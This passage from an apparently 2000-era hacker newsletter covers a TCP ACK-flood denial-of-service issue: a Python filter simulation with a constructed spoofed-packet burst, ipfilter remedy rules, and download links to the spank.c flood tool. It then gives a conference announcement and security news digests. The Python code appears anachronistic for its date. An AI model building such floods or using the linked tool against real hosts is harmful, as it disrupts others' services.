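    return Counter(decide(s, listening_ports, limiter) for s in segments)


def constructed_flood():
    """Constructed sample: two real connection attempts plus a spank-style burst."""
    target = "203.0.113.5"                          # documentation address, not a real host
    segs = [
        TcpSegment("198.51.100.1", target, 40000, 80, TH_SYN),       # legitimate SYN
        TcpSegment("198.51.100.2", target, 40001, 81, TH_SYN),       # SYN to a closed port
        TcpSegment("198.51.100.3", "224.0.0.1", 40002, 80, TH_ACK),  # to multicast
        TcpSegment("224.0.0.9", target, 40003, 80, TH_ACK),          # from multicast
        TcpSegment("198.51.100.4", target, 40004, 80, 0),            # no flags at all
    ]
    # stream.c style: ACKs from spoofed sources with no matching connection
    segs += [TcpSegment(f"198.51.100.{10 + i}", target, 50000 + i, 80, TH_ACK)
             for i in range(40)]
    return segs


if __name__ == "__main__":
    # frozen clock: the whole burst lands inside one second of RST budget
    print(run_filter(constructed_flood(), {80}, per_second=10, clock=lambda: 0.0))
```

With the clock frozen the whole burst falls inside one second of budget, so the filter accepts the one real SYN, sends ten RSTs and silently drops the remaining thirty-four segments (the two multicast ones unconditionally); with a live clock the bucket refills at the configured rate, which is the threshold behaviour the write-up describes.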
---------------------------------------------------
Temporary remedy
---------------------------------------------------

If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue.

-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --

Optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow), but you have bigger problems than the attack if that is the case.

-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --

That will help you "stop" the attack (actually it will just help minimize the effects), although it will still use some CPU.

Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds.

FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff

-----------------------
Conclusion
-----------------------

This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms.

--------------------
References
--------------------

This was done independently, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due.

The following people contributed in some way or another:

Brett Glass
Alfred Perlstein
Warner Losh
Darren Reed
Don Lewis

Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)

-------------------
Attached
-------------------

These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet

For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff

For spank.c:
http://www.w00w00.org/files/spank/spank.c

@HWA

15.0 Canadian Security Conference announcement: CanSecWest.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canc0n may have failed as the first security/hacker con in Canada, so here is a promising sounding event pulled off by professional boys.

CanSecWest/core00
April 19th, 20th, 21st, 2000
Vancouver, BC, Canada.

"Every IT/Security person who can attend, should attend. CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada."

Website: http://www.dursec.com/

Some high profile speakers are scheduled to appear. Noted speakers include:

Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area.

Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600, now of Ernst & Young's security team, will give some pointers on NT security.

Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders.

rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training.

Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about securing operating systems.

Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network.

Max Vision - www.maxvision.net - www.whitehats.com
Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation.

Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately.
@HWA

16.0 Security Portal review Jan 16th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Entrust - We Bring Trust to e-Business

Entrust Technologies lets you tap into new global e-business markets by securing applications for Web, e-mail, ERP, VPN, desktop files and folders, as well as a comprehensive suite of solutions to deliver trusted e-business transactions to the exploding wireless Internet appliance market. For more information on this complete range of security solutions for e-business visit http://www.entrust.com . Come see us at RSA 2000, San Jose, CA, Jan. 16-20, 2000, San Jose McEnery Convention Center, Booth #416.

******* What's new with SecurityPortal.com *******

Linux vs Microsoft: Who solves security problems faster?

Does Open Source plug security holes quickly? We took a look at the security advisories issued by Microsoft and Red Hat in 1999 to gauge the time lag between the point of a "general community awareness" of a security problem and the point at which a patch was released. Find out who won here.

SecurityPortal.com is proud to sponsor Techno-Security 2000
April 16-19, 2000
Wyndham Myrtle Beach Resort
Myrtle Beach, South Carolina

This one-of-a-kind conference is intended for private industry, government, law enforcement decision makers and technical experts interested in, or involved with, information security, operations security, high tech crime and its prevention. Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell, Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr. Terry Gudaitis, Matt Devost and many more...

This year's high intensity tracks will include: Hacker Profiling, Intrusion Detection, Beginner & Advanced Computer Forensics, e-Commerce Security, Body Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing, Incident Response, Tools for Protecting the Enterprise, PKI, plus many more.

Registration is available on-line at: www.TheTrainingCo.com or call 410.703.0332 for more information.

******* Vendor Corner *******

Sponsored by Trend Micro, Inc. http://www.antivirus.com .

ScanMail for Lotus Notes is a native Domino server application.
- First product to provide complete, scalable virus protection for Lotus Notes.
- Detects and removes viruses hidden in databases and email attachments.
- Provides real-time scanning of incoming and outgoing emails through the Domino server.
- Infection notification and provides a Virus Activity Report to assist in tracing and securing virus point of entry.
- Multi-threaded architecture delivers high performance.
- SmartScan eliminates redundant scanning to maximize server efficiency.

******* Top News *******

January 17, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Biggest news of last week was probably the new encryption export regulations released by the U.S. We will let you know when our lawyers get through them.

Recent postings in our top news:

Jan 17, 2000

MSNBC: Microsoft certificate bug crashes Netscape browser - IIS 4 does not correctly support 56-bit certificates, so when Communicator tries to step up to the highest level of security (128-bit key length certificates), it simply crashes with an invalid page fault in NETSCAPE.EXE

ZDNet: Computer glitch gives Canadian Microsoft Web site - a glitch at Network Solutions briefly gave a Canadian ownership of Microsoft.com and Yahoo.com over the weekend

Jan 15, 2000

ABCNews: Online Credit Hacker May Be Out for Profit - While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that Maxus is actually a two-man team in Russia engaged in a well-organized credit card fraud

FCW: FBI beefs up cyberagent squads nationwide - The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office

ZDNet: Network Associates divides itself - Convinced that six smaller companies can compete better than one big one, Network Associates gives up on its integrated security strategy

ZDNet: How to steal 2,500 credit cards - Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site

Jan 14, 2000

IDG: U.S., EU to meet on data privacy - The U.S. government has invited representatives from European Union countries to Washington D.C. next week to work out an agreement on data privacy before their self-imposed March deadline

CNet: Security software firm Tripwire plans Linux push - Security software maker Tripwire is planning to unveil a major expansion into new types of computing products, especially those running on the Linux operating system

ZDNet: Crypto compromise a lawyers' delight - It's supposed to ease encryption export controls. But have the Clinton Administration's new regs instead created a legal maze?

CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED NEWAPTd - Computer Associates International, Inc. yesterday warned computer users of a worm called "NewApt.D," a new variant belonging to the NewApt family of Win32 worms. The worm uses e-mail and executable attachments to propagate from one computer to another. This worm has been reported in the wild. The original NewApt worm was first detected in December 1999

Jan 13, 2000

CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000 - Computer Associates International, Inc. today warned computer users of a new worm called Plage2000 which could threaten computer email systems as well as eBusiness infrastructures. This worm has been reported to be in the wild by CA customers. CA's antivirus research team is analyzing this worm and will provide more details as they are determined

InternetNews: Circle Tightens Around Online Credit Card Thief - Law enforcement officials may be closing in on Maxus, the Russian cracker who stole 300,000 credit card numbers from e-tailer CD Universe last month and dispensed them for free to visitors of his Web site

Microsoft Bulletin: Patch Available for Spoofed LPC Port Request Vulnerability - The LPC vulnerability could allow a user logged onto a Windows NT 4.0 machine from the keyboard to become an administrator on the machine

Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux - Secure Computing Corporation today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications

ComputerWorld: Teens steal thousands of Net accounts - A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California

Commerce Announces Streamlined Encryption Export Regulations - The U.S. Department of Commerce Bureau of Export Administration (BXA) today issued new encryption export regulations which implement the new approach announced by the Clinton Administration in September

InfoWorld: Oracle turns focus to security with Release 2 of 8i database - With an eye on the complex security needs of large electronic-commerce sites, Oracle next week will introduce Release 2 of its flagship database, Oracle 8i, at the RSA Conference 2000 in San Jose, Calif.

FCW: Army establishes Infowar DMZ - The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks

Jan 12, 2000

FSecure: First Windows 2000 Virus Found - F-Secure Corporation, a leading provider of centrally-managed, widely distributed security solutions, today announced the discovery of the first Windows 2000 virus. Windows 2000 is the upcoming new operating system from Microsoft, due to be released later this year. The new virus is called Win2K.Inta or Win2000.Install. It appears to be written by the 29A virus group. It operates only under Windows 2000 and is not designed to operate at all under older versions of Windows

Kurt's Closet: Some thoughts on (network) intrusion detection systems - Kurt makes the case for the necessity of emulated intelligence within intrusion detection systems and reviews some current research projects in this field

RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino R5 - Lotus to integrate RSA's KEON public key infrastructure software into Notes and Domino R5

ZDNet: Data thief threatens to strike again - An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site

Wired: Domains Hijacked from NSI - Network Solutions' administrative policies are once again being blamed for Internet domain hijackings that took at least brief control over some major Web domains

Jan 11, 2000

InternetNews: Cybercash Disputes Hacker's Claim - Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the company's credit card verification system was penetrated, resulting in the theft of thousands of credit card numbers from an online music store

FoxNews: Designed for Destruction - Deliberately destructive viruses are on an upward trend, according to Symantec's Antivirus Research Center (SARC). Approximately 10 percent of 1993 viruses were deliberately destructive, but in 1997 that number rose to 35 percent. Often masquerading as innocuous e-mail, games or even fixes to real problems like the Y2K bug, today's viruses are more insidious than their counterparts were only a few years ago

Wired: Crack Exposes Holes in the Web - There are Web site cracks, there are break-ins, and there are thefts. But now and then one rises above the fray to teach a sudden lesson about all things Internet

NWFusion: Win 2000 VPN technology causes stir - When it ships next month, Microsoft's Windows 2000 will come with technology for setting up an IP Security-based virtual private network. The question is: Will established VPN products from other vendors work with Microsoft's technology?

New Internet Explorer vulnerability discovered by Guninski - Georgi Guninski posted a new advisory concerning a new IE 5 security vulnerability - circumventing Cross-frame security policy and accessing the DOM of "old" documents. This vulnerability can potentially allow access to local data. No response from Microsoft yet

Securing E-Business in the New Millennium - this article states the real threat will continue to be from within, and provides advice on the primarily low tech preventative measures any organization should take

Jan 10, 2000

Sophos: Virus found on magazine CD ROM - The WM97/Ethan virus was accidentally distributed on the December 1999 cover CD ROM of Developers Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999, contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC

Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43 Deferral - Any PIX Firewall on which version 4.43 software is present will continuously reboot. No other released versions of PIX Firewall are affected

******* What's new with SecurityPortal.com *******

Email Bombing

Denial of Service (DoS) attacks, strange variants in the computer crime arena, often occur without clear economic motive. Usually, they arise from anarchistic impulses within the computer underground. And, email bombing is one of the easiest DoS attacks for the Huns of the Internet to perfect. Read the story here.

Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com .
Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com @HWA 17.0 Security Portal review Jan 24th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Write Your Information Security Policies In A Day! INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+ already-written security policies by internationally-known consultant Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in Version 7! ISPME v7 is the most comprehensive collection of policies available covering the latest technology developments and infosec topics. Each of these policies is accompanied by commentary detailing policy intention, audience, and the circumstances where it applies. Save weeks of time and thousands of dollars developing policies for information security manuals, systems standards, etc. with no consultant fees. Visit us at http://www.baselinesoft.com for more information. ******* What's new with SecurityPortal.com ******* The Clock Strikes Midnight for RSA In a date more feared by RSA Security than Y2K, the patent for the venerable RSA data encryption algorithm will expire on September 20th of this year. No longer will RSA be able to charge royalties for the algorithm, first published by Ron Rivest, Adi Shamir and Leonard Adelman in 1977 and patented in 1983. After patent expiration, the algorithm will become part of the public domain, and companies will be free to incorporate the algorithm into their products without paying RSA any type of royalty or licensing fee. Although the demise of a 17 year patent for widely used technology is a big deal, there is also a distinct possibility that, like Y2K, it will turn out to be a non-event due to the momentum of the established security industry. Read the full story here. ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. 
With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 ******* Top News ******* January 24, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news : Jan 24, 2000 IDG: NEC to unveil world's strongest encryption system - NEC says it will unveil a new encryption technology on Monday that it claims to be the world's strongest ZDNet: Mitnick: I was manipulated - Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years Jan 21, 2000 Microsoft: Patch Available for "RDISK Registry Enumeration File" Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in an administrative utility that ships with Microsoft® Windows NT® 4.0, Terminal Server Edition. The utility creates a temporary file during execution that can contain security-sensitive information, but does not appropriately restrict access to it. As a result, a malicious user on the terminal server could read the file as it was being created. CNN: Microsoft vows security commitment on Windows 2000 - Microsoft is pledging a firm commitment to security with measures such as equipping its upcoming Windows 2000 operating system with 128-bit encryption and interacting with users and rival vendors to detect software breaches and bugs, a high-ranking company official said in a keynote speech at the RSA Conference 2000 show here Tuesday. iDEFENSE and Internet Security Systems Form Strategic Alliance - Infrastructure Defense, Inc. 
(iDEFENSE), a leading intelligence and risk management consulting company, and Internet Security Systems (ISS) (Nasdaq: ISSX), a leading provider of security management solutions for e-business, announced today a strategic agreement to integrate iDEFENSE and ISS capabilities, providing customers with an expanded line of information security offerings. As a result of the agreement, iDEFENSE and ISS will share expertise, data and resources as well as resell each company's products and services to respective customers ZDNet: Hacker Mitnick to be released Friday - Come Friday, for the first time since 1995, Kevin Mitnick will be free. Will he hack again? OpenBSD Security Advisory: procfs - Systems running with procfs enabled and mounted are vulnerable to having the stderr output of setuid processes directed onto a pre-seeked descriptor onto the stack in their own procfs memory FreeBSD Security Advisory: make - make uses the temporary file in an insecure way, repeatedly deleting and reusing the same file name for the entire life of the program. This makes it vulnerable to a race condition wherein a malicious user could observe the name of the temporary file being used, and replace the contents of a later instance of the file with her desired commands after the legitimate commands have been written Jan 20, 2000 Currents: Virus Attacks Cost 12Bil - Virus attacks cost organizations a total of $12.1 billion during 1999, according to a report released today. Released by Computer Economics, the report said that over the last three years there has been a major programming shift as viruses have become far more malicious and specifically designed for destruction and damage UnionTribune: Global Health hit by hacker - A Poway company selling health products over the Internet was the apparent victim of a "hacker," who took information containing customer names and credit-card numbers and posted them on a Web site. 
The incident occurred Monday when someone accessed a little-used Web site kept by Global Health Trax, posted information that had been deleted months ago, then tipped off a reporter for MSNBC about it Wired: Say Hello to the NSA - It wasn't hard to do if you were at the RSA Security conference this week in San Jose. The National Security Agency was there, like any other exhibitor, to be seen and promote technology partnerships Microsoft Bulletin: Malformed Conversion Data Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in a utility that converts Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent formats. A patch is available for the buffer overflow problem Computer Currents: Symantec Gets Anti Virus Patent - Symantec has announced that a key technology in its Striker anti-virus engine has been granted patent rights by the US Patent and Trademark office. The firm said that the next-generation technology enables the Striker engine to detect complex polymorphic, or self-mutating, viruses much more rapidly than traditional anti-virus engines Wired: Clinton Favors Computer Snooping - The Clinton administration wants to be able to send federal agents armed with search warrants into homes to copy encryption keys and implant secret back doors onto computers Computer Currents: Encryption Challenge Beaten - A 56-bit security challenge laid down by CS Communication & Systemes in March, 1999, has been cracked in just two months by a team of students working with no less than 38,000 Internet users around the world TechWeb: Washington Rep: Encryption Rules Need Work - interview with Rep Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from [previous policy]," Goodlatte said. "But the problem is the implementation of it. They've made the application process [for encryption export] complex and cumbersome." 
The Fastest Growing Crime in America: Identity Theft - One of the nation's fastest-growing crimes is identity theft. Using a variety of methods, criminals obtain key pieces of a person's identity and fraudulently use that information for various illegal reasons. Some law enforcement officials estimate about 3,000 cases of identity theft a day within the United States

Jan 19, 2000

InformationWeek: Security Vendors Intro Wireless Tools - With the ongoing convergence of Internet and wireless devices such as cell phones and personal digital assistants, there's heightened awareness of security issues among vendors and customers. At the RSA 2000 Security Convention in San Jose, Calif., this week, vendors addressed the issue with a variety of new products and alliances

InformationWeek: Cisco To Acquire Two VPN Vendors - Looking to give users options for building virtual private networks, Cisco Systems today disclosed plans to supplement its product portfolio by buying VPN vendors Altiga Networks and Compatible Systems for a combined 567 million in stock

Canoe: Dodging a hack attack - Just how safe is your data on the Net? The stories are scary: Just before Christmas, a 14-year-old kid was arrested in Toronto after hacking a company's site and changing the passwords. He was arrested when he showed up to collect his $5,000 ransom. A couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card numbers hostage, demanding CDUniverse pay him US$100,000. To make good on his threat, he started posting the information publicly. So far, CDUniverse hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site of the U.S. Library of Congress

NAI: W32/Ska2K.worm virus, Risk Low - This edition of the worm is only a minor variation of the original first identified in February 1999. This worm is detected with current DAT files. The file may be received by email with a size of 10,000 bytes. The worm if run will patch WSOCK32.DLL to promote distribution by email on the host system if the email application supports SMTP email communication. If the host supports this environment, emails when sent from the host will be followed by a second message with the worm either attached or included as MIME

TechWeb: Zero Knowledge Hires Open Source Guru - Mike Shaver, who headed developer relations for the Mozilla.org project, is joining Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking Internet service

Kurt's Closet: SuSE Linux - a vendor gets security conscious - a look at the built in security features of SuSE Linux, including an interview with SuSE security maven Marc Heuse

MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend - A "smurf" attack or series of attacks on an Internet service provider snarled World Wide Web traffic in as much as 70 percent of the region last weekend, operators of the service say. See http://securityportal.com/cover/coverstory19990531.html to learn about Smurf Amplifier Attacks

Jan 18, 2000

Response: Some thoughts on (network) intrusion detection systems - Kurt Seifried responds to the article featured prominently at Linux Today questioning his analysis of the shortcomings of network-based intrusion detections. (How much confidence do you have in your ID tools?)

Sophos: Guidelines for Safe Hex - As well as keeping your anti-virus software up to date there are other ways in which you can reduce the chances of virus infection inside your company. We list some of the guidelines you might like to consider for safer computing in your organisation

TechnologyPost: Hackers target Visa, other big firms - Visa International has confirmed British press reports at the weekend that its global network was sniffed by hackers or similar people unknown last summer, but that its security systems locked down the on-line sessions before any systems break-ins occurred

Wired: Online Security Remains Elusive - As e-business lights up the Web, the critical matter of data security is headed for center stage. There have been too many security failures in the past and it's going to get worse, said Paul Kocher, president and chief scientist for Cryptography Research

FoxNews: Artificial Immunology - Protection and recovery efforts from hack attacks and viruses account for 2.5 percent - or 25 billion - of global spending on information technology each year. The costs are so high mainly due to labor-intensive data recovery and productivity loss from downed systems

Sophos: WM97/Marker-BU a Word 97 macro virus - WM97/Marker-BU is a variant of Marker-R with various changes, and has been seen in the wild. If the date is between 23rd and 31st of July the virus changes the Application.Caption from Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but not me. It then displays a message box asking Did You curse Shankar on his Birthday? If you answer Yes another message box appears saying Thank You! I love you. are u free tonight? However, if you click No a message box appears saying You are Heart Less. The virus then makes changes to the document summary

TechWeb: Entrust Launches Security Outsourcing - Entrust, a provider of public key infrastructure and digital certificate security applications, on Monday unveiled plans to provide outsourced security services for business-to-business and business-to-consumer transactions, and said it has partnered with Cash Tax to host the service

InfoWorld: Panelists debate the issues surrounding cryptography - Issues including ease of use, governmental regulations, and wireless systems will be at the forefront of the cryptography realm in upcoming years, a panel of specialists said Monday at the RSA Conference 2000 show. The panelists, with affiliations ranging from the Massachusetts Institute of Technology to Sun Microsystems, urged that a variety of actions be taken by the industry

Wired: 56 a Bit Short of Secure - The collective crackers of Distributed.net have knocked off another 56-bit encryption key, this time in just over two months

InfoWorld: Verisign aims to secure wireless transactions - At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of technologies, services, and alliances to promote trusted, wireless Internet commerce. Citing the growth in usage of wireless devices, VeriSign Vice President of Worldwide Marketing Richard Yanowitch said that the initiative is intended to provide a complete trust infrastructure to the wireless world

PCWorld: The Web Is a Hacker's Playground - Can the Net be crime-proofed? Not as long as there are sloppy programmers and clever cat burglars

Microsoft Bulletin: Malformed RTF Control Word - The control information is specified via directives called control words. The default RTF reader that ships as part of many Windows platforms has an unchecked buffer in the portion of the reader that parses control words. If an RTF file contains a specially-malformed control word, it could cause the application to crash. A patch is available for this vulnerability, which can cause a Denial of Service condition in all Microsoft Operating Systems

Jan 17, 2000

FCW: NSA grapples with Linux security - The National Security Agency, the super-secret arm of the Defense Department responsible for signals intelligence and information systems security, last week tapped Secure Computing Corp. to develop a secure version of the Linux operating system

IDG: Film studios bring claim against DVD hackers - Eight major motion picture companies late last week filed injunction complaints in U.S. Federal Court against three alleged hackers to prevent them from publishing an unauthorized DVD de-encryption program on their Web sites

******* What's new with SecurityPortal.com *******

The Unbreakable Cipher: Why Not Just Stay With Perfection?
John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here.

Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com .

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

@HWA

18.0 Security Portal Review Jan 31st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Sponsored by VeriSign - The Internet Trust Company
Protect your servers with 128-bit SSL encryption today! Get VeriSign's FREE guide, "Securing Your Web Site for Business". It tells you everything you need to know about using SSL to encrypt your e-commerce transactions for serious online security.
Click here! http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000

******* What's new with SecurityPortal.com *******

Information Warfare
As the latest buzzword to succeed Y2K on the media's "terror throne," information warfare (IW), as a useful term, begs for realistic definition. No doubt, bin Laden can attack us. Graduate students at Cal Tech, MIT, or UCLA and tenth-graders at your local high school can also launch "volleys" against corporate America. How effective such invasions would be is the critical issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast rounds against allied planes, and it was almost totally ineffective. Sheer bulk doesn't always equate to victory. Read the full story here.

A Practical Guide to Cryptography
What is it, where do I get it and how do I use it? Kurt Seifried has developed a How-to for using cryptography with several operating systems. Find the guide here.

******* Vendor Corner *******

NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service.
With Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do
Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best.
Click for more info: http://www.entrust.com/choice2

******* Top News *******

January 31, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news:

Jan 31, 2000

ZDNet: What's wrong with Microsoft security? - The term "Microsoft's latest security glitch" has become a cliche. But it didn't have to

Jan 28, 2000

Wired: Fast, Simple ... and Vulnerable - An online bank's opening has been marred by a glitch that let customers transfer money from any U.S. bank account. Anyone who knew what they were doing could move funds to an X.com bank account and then withdraw them

ZDNet: Win2000 security hole a 'major threat' - Six banks and three major PC makers affected by bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch.
CNN: DoubleClick suit filed - Woman accuses Net advertising firm of privacy violations

TechWeb: Axent To Develop Linux Firewall With Cobalt - E-security vendor Axent Technologies Thursday unveiled a partnership with Cobalt Networks under which the companies will produce a Linux firewall and virtual private network appliance for small to midsize companies, branch offices, and service providers

ComputerWorld: Congress backs federal efforts on Y2K, is wary on security - Fernando Burbano, the CIO at the U.S. Department of State, said federal agencies don't have the money to pursue critical infrastructure protection initiatives

LinuxJournal: Crackers and Crackdowns - DeCSS author Jon Lech Johansen's home was raided by special police forces at the whim of the Motion Picture Association, an organization which affectionately refers to itself as "a little State Department".

Mercury Center: Student charged with hacking - A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

InternetNews: Hackers Close Japanese Government Sites - So far this week, hackers have made three successful attacks on the official Web sites of two Japanese government agencies, altering the agencies' homepages and possibly deleting government data.

ZDNet: Smart card 'inventor' lands in jail - Serge Humpich says he wasn't really stealing subway tokens -- just testing his new invention. It could cost him seven years.

Jan 27, 2000

Wired: U.S. to Push China on Encryption - The United States will press China to explain new regulations on encryption technology at a meeting of economic leaders in Davos, Switzerland, U.S. Trade Representative Charlene Barshefsky said Thursday.

TheRegister: New hack attack is greater threat than imagined - It was news a month ago; days later it vanished. The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks. Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat

ZDNet: Does DoubleClick track too closely? - Many e-shoppers don't realize that companies like DoubleClick's Abacus Direct pick up your trail at one of their sites and follow it wherever you go

vnunet: Visa strengthens network after number kidnap - Last week a Visa spokesman admitted that hackers had penetrated its computer network last July, but stressed that they were detected almost immediately. The company has since hardened its systems and the hackers have not returned, he said

TheRegister: New crypto technique beats current standard - Called Cipherunicorn-A, the technique creates a number of false keys in addition to the true encryption key, making it more difficult for potential intruders to crack. The approach should increase security while remaining compliant with the Data Encryption Standard (DES) introduced by the US Department of Commerce, a company spokesperson told The Register

CNet: Corel hurries to fix Linux security hole - Corel is working to patch a bug with its version of Linux that could let unauthorized users gain access to machines running Corel Linux, with a program called Corel Update

ZDNet: Bernstein crypto case to be reheard - A U.S. Appeals Court panel will reconsider an earlier ruling striking down export limits on computer data scrambling products in light of new export rules announced this month by the White House

Microsoft Bulletin: Index Server - This patch eliminates two vulnerabilities whose only relationship is that both occur in Index Server. The first is the "Malformed Hit-Highlighting Argument" vulnerability. The second vulnerability involves the error message that is returned when a user requests a non-existent Internet Data Query file

SCO Security Advisories: rtpm, scohelp - patches are available for buffer overflow vulnerabilities in rtpm, scohelp

CNN: Security improvements made at national labs - Security at nuclear weapons labs has made "monumental strides" in the past year, but computer protection is still not 100 percent, the Energy Department's top security official says.

Jan 26, 2000

Wired: Echelon 'Proof' Discovered - References to a project Echelon have been found for the first time in declassified National Security Agency documents, says the researcher who found them. Researcher claims there is no evidence over mis-use of the system

Industry Standard: China Installs Net Secrecy Rules - China clamped new controls onto the Internet on Wednesday to stop Web sites from "leaking state secrets" and an official newspaper said curbs on news content were on the way

BBC: Old computer viruses still bite - An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common. One boot sector virus, Form, is nearly a decade old but still appears in the top ten

